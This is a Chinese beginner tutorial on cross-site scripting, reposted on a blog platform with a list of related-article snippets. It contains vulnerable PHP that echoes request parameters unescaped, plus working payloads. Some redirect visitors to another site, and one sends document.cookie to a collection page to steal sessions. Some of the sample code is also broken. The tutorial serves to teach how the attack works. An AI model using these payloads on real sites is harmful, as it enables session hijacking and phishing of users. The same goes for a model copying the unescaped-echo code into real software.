XSS攻击基础

最新推荐文章于 2024-08-15 15:00:52 发布
最新推荐文章于 2024-08-15 15:00:52 发布
阅读量67 收藏
点赞数
文章标签: php python
原文链接:https://my.oschina.net/xiongyuanliang/blog/548752
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

XSS攻击是一个非常常见的攻击。
  1.最简单版本:
  <?php
     $name = $_GET['name'];
     echo  " hello  <br >$name";
   ?>
   本意是获取到了test后,告诉用户test提交成功
   www.test.com以为是个安全连接一般用户会被认为是
   www.test.com?name=boy 这种:
 实际上攻击者写的
 www.shopxiong.com/xss.php?name=<script>window.οnlοad=function(){
  window.location.href="http://www.baidu.com";
 }</script>
经过url编码后
www.test.com/xss.php?name=%3Cscript%3Ewindow.οnlοad=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
用户可能还误以为在www.test.com站点,其实此时会自动跳转到baidu.com网站里面。如果此时A和B非常相似,没有注意此时已经不是A站了(最常见的是钓鱼站点),会泄漏自己的账号信息
2.对A站点发送了一个恶意攻击的语句
   恶意语句依然和上面一样:%3Cscript%3Ewindow.οnlοad=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
  test1.php
 <?php
    $text =  file_put_contents($_GET['text'],1.txt);
  ?>
  另外一个页面对这些进行读取  test2.php
  <?php  echo   file_get_contents("1.txt");  ?>
  当你访问test.php  无奈的发现,每当访问那个网站,都会自动跳转到baidu.com页面
  场景:恶意攻击者给某个用户进行留言(但是留言没有经过严格过滤,直接进行了暂时性的保存)然后另外一个用户点击查看恶意攻击者给其的留言的时候,触发该脚本(跳转到另外一个页面或者弹窗)
3.窃取当前用户的session或者网站cookie,对用户进行虚拟模仿
     document.cookie(可以获取到用户的session和相关登录后信息)
   仍然和上面相似。恶意攻击者通过某种手段把数据提交后
   在另一个页面进行调用
   www.shopxiong.com/xss.php?name=<script>window.οnlοad=function(){
  window.location.href="http://www.shopxiong.com/test3.php?c="+document.cookie
 }</script>
  窃取当前访问者的cookie 然后通过另一个访问链接进行保存

转载于:https://my.oschina.net/xiongyuanliang/blog/548752

weixin_33695450
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS攻击理论基础
caoxinjian423的博客
09-02 226
1、XSS简介 XSS(Cross Site Scripting)攻击全称跨站脚本攻击,为了不与CSS(Cascading Style Sheets)混淆,故将跨站脚本攻击缩写为XSS,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 通俗的来说就是我们的页面在加载并且渲染绘制的过程中,如果加载并执行了意料之外的程序或代码(脚本、样式),就可以认为是受到了 XSS攻击。通常黑客通过“HTML注入”篡改了网页,插入恶意脚本,从而在用户浏览网页时
xss攻击基础
ssrf
12-03 628
目录0x001 反射型(get)0x002 反射型(post)0x003 存储型xss0x004 DOM型xss0x005 DOM型xss-x0x006 xss之盲打0x007 xss之过滤0x008 xss之htmlspecialchars0x009 xss之href输出0x0010 xss之js输出 以下实验环境:本地搭建靶场pikachu 0x001 反射型(get) payload <script>alert(/xss/)</script> 0x002 反射型(pos
XSS跨站脚本攻击(基础
HurryPotter
07-24 478
跨站脚本攻击xss: 介绍:由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端JavaScript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 XSS跨站脚本攻击本身对Web服务器没有直接危害,它借助网站进行传播,使网站的大量用户受到攻...
网络攻击之XSS攻击入门
sdu_jsfeng的博客
09-26 1104
目录XSS简介XSS分类XSS攻击代码构造方式反射型XSS详解如何XSS攻击绕过检查更复杂的XSS攻击用得到的网站用得到的工具 XSS简介 XSS 其实是 cross-site scripting(跨域脚本攻击) 的简写。他的重点在于 跨域 以及 脚本 这两个词。为什么会产生这个攻击类型呢?最大的原因在于,网站对于用户的输入过于信任,用户输入什么都可以,服务器也不会对用户的输入进行检查,于是攻击者...
XSS脚本攻击使用方法初级教程
11-27
XSS跨站攻击介绍,解释XSS是如何进行攻击的以及执行攻击的实例
Xss跨站脚本攻击基础
04-11
### Xss跨站脚本攻击基础 #### 一、XSS攻击概述 XSS(Cross Site Scripting)攻击,即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。这种攻击方式利用网页开发时的疏忽,允许攻击者将恶意脚本注入到网页中,当...
简单模拟XSS攻击.zip
07-05
通过这个项目,你可以学习到如何构建一个基础的Web应用,理解XSS攻击的原理,并学习如何在后端验证和清理用户输入,防止此类攻击的发生。同时,这也是一个很好的实践平台,加深对Node.js、Express以及JavaScript安全...
Web安全之XSS攻击与防御小结
10-17
Web安全中的XSS攻击是一种常见的网络攻击方式,全称为跨站脚本攻击。攻击者通过在Web页面中插入恶意的JavaScript代码,当受害者访问这些被污染的页面时,恶意脚本将被执行,从而可能导致敏感信息泄露、账户劫持等...
XSS跨站脚本攻击课件
11-24
XSS攻击基础在于HTML代码和JavaScript的注入。攻击者寻找Web应用中未能正确过滤用户输入的环节,将恶意脚本嵌入到网页中。当用户访问这些含有恶意脚本的页面时,浏览器会无差别地执行其中的代码,允许攻击者读取...
XSS基础
qq_57157540的博客
04-25 3383
a.XSS和SQL注入攻击中的攻击指令都是由黑客通过用户输入域注入,只不过XSS注入的是HTML代码(以后称脚本),而SQL注入注入的是SQL命令。 b.XSS和SQL注入攻击都利用了Web服务器没有对用户输入数据进行严格的检查和有效过滤的缺陷 。 c.SQL注入的SQL命令在用户浏览器中执行,而XSS跨站的脚本在Web后台数据库中执行。 d.XSS攻击盗取Web终端用户的敏感数据,甚至控制用户终端操作;SQL注入攻击盗取Web后台数据库中的敏感数据,甚至控制整个数据库服务器
xss基础
slpond的博客
11-28 1958
xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因有下: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完成自动化攻击 4、前期需要基本的html、js功底,后期需要扎实的html、js、actionscript2/3.0等语言的功底 5、是一种被动的攻击手法 6、对website有http-only、crossdomian.xml没有用 但是这些并没
跨站脚本攻击漏洞(XSS):基础知识和防御策略
热门推荐
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础
XSS攻击详解
wanqianshao的博客
12-15 4903
一.xss攻击简介 1.OWASP TOP 10 之一,XSS被称为跨站脚本攻击(Cross-site-scripting) 2.主要基于java script 完成恶意攻击行为。JS可以非常灵活的操作html、css和浏览器,这使得XSS攻击的想象空间特别大。 3.XSS通过将精心构造代码JS注入到网页中,并由浏览器解释运行这段代码,以达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 4.微博,留言板,聊天室等等收集用
xss植入_xss攻击入门
weixin_39725118的博客
12-21 225
XSS:Cross Site Scripting(跨站脚本攻击),通过插入恶意脚本,实现对用户游览器的控制。(XSS攻击)与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的。xss攻击可以分成两种类型:非持久型攻击持久型攻击1.非持久型xss攻击非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后...
前端安全之XSS攻击
weixin_34381666的博客
02-18 1160
XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是: 1. Reflected XSS(基于反射的XSS攻击) 2. Stored XSS(基于存储的XSS攻击) 3. DOM-based or local XSS(基于DOM或本地的XSS攻击) Reflected XSS 基于反射的...
XSS攻击基础防御
lovelichao12的专栏
03-24 3434
XSS攻击听说过,没见过,后来通过查资料了解一点,这篇文章中,主要是针对XSS攻击做一个基本的防御,我也不知道能不能防的住,防不住在加规则,中国式解决问题:哪疼医那。哈哈由于公司用的是 SpringMVC,因此,这次就主要基于 SpringMVC 来解决这些漏洞。当然,其实这些解决方案都是大同小异,对于什么环境来说根本无所谓。了解了原理,什么环境、什么语言都可以运用自如了。废话就不多说了,直接上解...
文件上传-.user.ini利用
feiwujiushiwo的博客
08-13 251
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
多媒体技术及应用课程思政网站
最新发布
m0_73706453的博客
08-15 501
在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括多媒体技术及应用课程思政网站的网络应用,在外国多媒体技术及应用课程思政已经是很普遍的方式,不过国内的多媒体技术及应用课程思政可能还处于起步阶段。多媒体技术及应用课程思政网站具有学习音频功能。多媒体技术及应用课程思政网站采用PHP语言,Thinkphp5框架,基于mysql开发,实现了首页、个人中心、学生管理、教师管理、课程分类管理、学习视频管理、学习课程管理、学习音频管理、课程笔记管理、反馈留言、系统管理等内容进行管理,本系
理解与防范XSS跨站攻击:从基础到实战
更严重的是,XSS攻击可以用来劫持用户的会话,这意味着攻击者可以模拟用户执行各种操作,比如在电子商务网站上进行非法交易、篡改用户数据或发送恶意邮件。 在挖掘XSS漏洞的章节,课程可能会介绍如何通过扫描工具、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值